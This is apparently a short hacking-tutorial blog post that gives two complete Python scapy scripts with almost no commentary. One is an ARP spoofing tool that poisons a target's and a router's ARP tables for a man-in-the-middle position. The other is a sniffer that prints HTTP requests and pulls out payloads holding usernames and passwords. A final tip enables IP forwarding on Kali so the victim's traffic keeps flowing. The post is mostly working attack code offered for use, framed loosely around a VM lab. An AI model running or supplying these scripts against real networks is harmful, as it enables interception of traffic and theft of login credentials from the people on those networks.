ARP_SPOOF + PACKET_SNIFFR

2 min read
0

NOTE: WE TOOK AN EXAMPLE OF ETH0/IN VM

CODE:ARP_SPOOFING_FILE_DRIVE

  1. #!/usr/bin/env python

  3. import scapy.all as scapy
  4. import time
  5. import sys

  7. def get_mac(ip):
  8.     arp_request = scapy.ARP(pdst=ip)
  9.     broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
  10.     arp_request_broadcast = broadcast / arp_request
  11.     answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

  13.     return answered_list[0][1].hwsrc

  15. def spoof(target_ip, spoof_ip):
  16.     target_mac = get_mac(target_ip)
  17.     packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
  18.     scapy.send(packet, verbose=False)

  20. def restore(destination_ip, source_ip):
  21.     destination_mac = get_mac(destination_ip)
  22.     source_mac = get_mac(source_ip)
  23.     packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
  24.     scapy.send(packet,count=4, verbose=False)

  26. target_ip = "10.0.2.9"
  27. router_ip = "10.0.2.1"

  29. try:
  30.    packets_sent_count = 0
  31.    while True:

  33.        spoof(target_ip, router_ip)
  34.        spoof(router_ip, target_ip)

  36.        packets_sent_count  = packets_sent_count + 2
  37.        print("\r[+] Sent " + str(packets_sent_count)),

  39.        sys.stdout.flush()
  40.        time.sleep(2)

  42. except KeyboardInterrupt:
  43.     print("\n[+] Detected CTRL + C...RESECTING ARP TABLE.\n")

  45.     restore(target_ip, router_ip)
  46.     restore(router_ip, target_ip)

CODE:PACKET_SNIFFING_FILE_DRIVE

  1. #!/usr/bin/env python

  3. import scapy.all as scapy
  4. from scapy_http import http

  6. def sniff(interface):
  7.     scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

  9. def get_url (packet):
  10.     return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path

  12. def get_login_info(packet):
  13.     if packet.haslayer(scapy.Raw):
  14.         load = packet[scapy.Raw].load
  15.         keywords = ["username", "userName", "login", "password", "pass"]
  16.         for keyword in keywords:
  17.             if keyword in load:
  18.                 return load


  21. def process_sniffed_packet(packet):
  22.     if packet.haslayer(http.HTTPRequest):
  23.         url = get_url(packet)
  24.         print("[+] HTTP Request >>" + url)
  25.         login_info = get_login_info(packet)
  26.         if login_info:
  27.             print("\n\n[+] Possible username/password >" + login_info + "\n\n")


  30. sniff("eth0")

IF U FACE ANY ERROR!! READ ME:)

  • IF THE TARGET IS AT VM CHAEK THAT IS AT NAT-NETWORK
  • IF INTERNET DOESNOT WORK WHILE RUNNING ARP /PUT THIS CODE IN KALI TERMINAL
  • echo 1 > /proc/sys/net/ipv4/ip_forward


4.94 / 169 rates

Post a Comment

If you have any doubts, please let me know

Previous Post Next Post